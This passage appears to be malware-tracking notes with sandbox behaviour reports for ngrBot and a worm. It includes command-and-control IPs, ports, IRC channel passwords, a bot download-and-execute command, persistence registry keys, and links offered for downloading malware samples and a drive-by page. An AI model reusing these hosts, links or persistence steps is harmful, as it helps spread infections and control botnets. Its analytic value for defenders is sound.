
* The data identified by the following URLs was then requested from the remote web server:
o http://rapidshare.com/files/3581947473/jamesbond.exe
o http://212.7.214.16/list.txt
o http://api.wipmania.com/


hosting infos:
http://whois.domaintools.com/212.7.214.39

193.106.172.131(ngrBot hosted in Russian Federation Moscow Iqhost Ltd)

Remote Host Port Number
193.106.172.131 1863 PASS ngrBot
213.251.170.52 80

NICK n{US|XPa}hvjyted
USER hvjyted 0 0 :hvjyted
JOIN #80t35ref 1963.g3rb3rs1t0.3691

hosting infos:
http://whois.domaintools.com/193.106.172.131

12mb malware samples

Mostly botnets and baking trojans
have fun

Download:
http://e422237e.tubeviral.com

Worm.Win32.FFAuto.uy

Exe file:
http://123back.com/1.EXE

Java drive by:
http://123back.com/

* The following Host Names were requested from a host database:
o sam.chatsmate.com
o ms.tvchatz.com
o chatsmate.com
o justchatz.com
o tvchatz.com

sam.chatsmate.com
ms.tvchatz.com
chatsmate.com
justchatz.com
UDP Connections
Remote IP Address: Port: 7202
Send Datagram: packet(s) of size 21
Recv Datagram: 3000 packet(s) of size 0
Remote IP Address: Port: 7202
Send Datagram: packet(s) of size 21
Recv Datagram: 3000 packet(s) of size 0
Remote IP Address: Port: 7202
Send Datagram: packet(s) of size 21
Recv Datagram: 3001 packet(s) of size 0
Remote IP Address: Port: 7202
Send Datagram: packet(s) of size 21
Recv Datagram: 3000 packet(s) of size 0

Registry Changes by all processes
Create or Open
Changes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Taskman" = C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Reads HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "DefaultAuthLevel"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Taskman"

File Changes by all processes
New Files \Device\RasAcd
C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Opened Files C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
\\.\PIPE\lsarpc
Deleted Files C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Chronological Order Create/Open File: \Device\RasAcd (OPEN_ALWAYS)
Set File Attributes: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Delete File: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Copy File: c:\1.EXE to C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe
Set File Attributes: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\hgfrhf.exe (OPEN_EXISTING)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)

hosting infos:
http://whois.domaintools.com/173.248.136.153

91.211.117.46(ngrBot hosted in Ukraine Zharkov Mukola Mukolayovuch)

Remote Host Port Number
213.251.170.52 80
91.211.117.81 80
91.211.117.46 1865 PASS ngrBot

NICK n{US|XPa}ruzgvfp
USER ruzgvfp 0 0 :ruzgvfp
JOIN #main 4m3r1k4
QUIT :rebooting

Now talking in #main
Topic On: [ #main ] [ .m off .up http://91.211.117.81/170611.exe e449762d93dad5da997f29c92ca6c6a5 -r .mdns http://91.211.117.81/170611.txt ]
Topic By: [ RamzGallagher ]

hosting infos:
http://whois.domaintools.com/91.211.117.46

bozoo.no-ip.biz

bozoo.no-ip.biz 94.120.148.91
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963
Outgoing connection to remote server: bozoo.no-ip.biz TCP port 15963

Registry Changes by all processes
Create or Open
Changes HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "mstwain32" = C:\WINDOWS\mstwain32.exe
Reads HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum "0"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Scripting "Default Impersonation Level"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging Directory"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Log File Max Size"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Repository Directory"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Scripting "Default Namespace"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ProcessID"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "EnablePrivateObjectHeap"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ContextLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "ObjectLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "IdentifierLimit"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{565783C6-CB41-11D1-8B02-00600806D9B6}\1.2\0 "win32"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system "EnableLUA"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Logging Directory"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM "Log File Max Size"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\AppCompatibility "DisableAppCompat"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56F9679E-7826-4C84-81F3-532071A8BCC5}\InprocServer32 ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers\File\0 "ProgID"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\file "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Mapi "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Outlookexpress "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\OTFS "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "ContentType"
